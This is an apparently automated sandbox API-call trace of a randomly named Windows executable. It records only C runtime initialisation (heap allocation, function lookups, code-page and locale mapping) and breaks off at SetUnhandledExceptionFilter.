# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 05.10.2020 05:03:15.024 Process: id = "1" image_name = "onb5h0yx46mrevq4.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe" page_root = "0x48ff5000" os_pid = "0x414" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x138 [0069.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xfa3759a0, dwHighDateTime=0x1d69ad4)) [0069.648] GetCurrentProcessId () returned 0x414 [0069.648] GetCurrentThreadId () returned 0x138 [0069.648] GetTickCount () returned 0x114be9e [0069.648] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=18975967567) returned 1 [0069.881] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x409651)) [0069.882] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x9d0000 [0069.883] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0069.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.884] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.885] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.885] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.885] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.885] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.886] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.886] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0069.886] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x214) returned 0x9d07d0 [0069.886] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.887] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0069.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0069.887] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0069.887] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0069.887] GetCurrentThreadId () returned 0x138 [0069.887] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.887] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x800) returned 0x9d09f0 [0069.888] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0069.888] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0069.888] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0069.888] SetHandleCount (uNumber=0x20) returned 0x20 [0069.888] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" " [0069.888] GetEnvironmentStringsW () returned 0xa01ca8* [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x0, Size=0xaca) returned 0x9d11f8 [0069.888] FreeEnvironmentStringsW (penv=0xa01ca8) returned 1 [0069.888] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4a88b0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x0, Size=0x7e) returned 0x9d1cd0 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x98) returned 0x9d1d58 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x3e) returned 0x9d1df8 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x6c) returned 0x9d1e40 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x6e) returned 0x9d1eb8 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x78) returned 0x9d1f30 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x62) returned 0x9d1fb0 [0069.888] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x2e) returned 0x9d2020 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x48) returned 0x9d2058 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x28) returned 0x9d20a8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x1a) returned 0x9d20d8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x4a) returned 0x9d2100 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x72) returned 0x9d2158 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x30) returned 0x9d21d8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x2e) returned 0x9d2210 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x1c) returned 0x9d2248 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0xd2) returned 0x9d2270 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x7c) returned 0x9d2350 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x36) returned 0x9d23d8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x3a) returned 0x9d2418 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x90) returned 0x9d2460 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x24) returned 0x9d24f8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x30) returned 0x9d2528 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x36) returned 0x9d2560 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x48) returned 0x9d25a0 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x52) returned 0x9d25f0 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x3c) returned 0x9d2650 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x82) returned 0x9d2698 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x2e) returned 0x9d2728 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x1e) returned 0x9d2760 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x2c) returned 0x9d2788 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x54) returned 0x9d27c0 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x52) returned 0x9d2820 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x2a) returned 0x9d2880 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x3c) returned 0x9d28b8 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x54) returned 0x9d2900 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x24) returned 0x9d2960 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x30) returned 0x9d2990 [0069.889] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x8c) returned 0x9d29c8 [0069.889] HeapFree (in: hHeap=0x9d0000, dwFlags=0x0, lpMem=0x9d11f8 | out: hHeap=0x9d0000) returned 1 [0069.891] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x8, Size=0x80) returned 0x9d2a60 [0069.891] GetLastError () returned 0x0 [0069.891] SetLastError (dwErrCode=0x0) [0069.892] GetLastError () returned 0x0 [0069.892] SetLastError (dwErrCode=0x0) [0069.892] GetLastError () returned 0x0 [0069.892] SetLastError (dwErrCode=0x0) [0069.892] GetACP () returned 0x4e4 [0069.892] RtlAllocateHeap (HeapHandle=0x9d0000, Flags=0x0, Size=0x220) returned 0x9d2ae8 [0069.892] GetLastError () returned 0x0 [0069.892] SetLastError (dwErrCode=0x0) [0069.892] IsValidCodePage (CodePage=0x4e4) returned 1 [0069.892] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0069.892] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0069.892] GetLastError () returned 0x0 [0069.892] SetLastError (dwErrCode=0x0) [0069.892] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0069.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.892] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0069.892] GetLastError () returned 0x0 [0069.892] SetLastError (dwErrCode=0x0) [0069.892] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0069.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā") returned 256 [0069.893] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.893] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0069.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåÏã\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.893] GetLastError () returned 0x0 [0069.893] SetLastError (dwErrCode=0x0) [0069.893] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.893] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā") returned 256 [0069.893] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.893] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ폐ꐎ曳@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0069.893] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿåÏã\x91\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.894] RtlSizeHeap (HeapHandle=0x9d0000, Flags=0x0, MemoryPointer=0x9d2a60) returned 0x80 [0069.894] SetUnhandledExceptionFilter 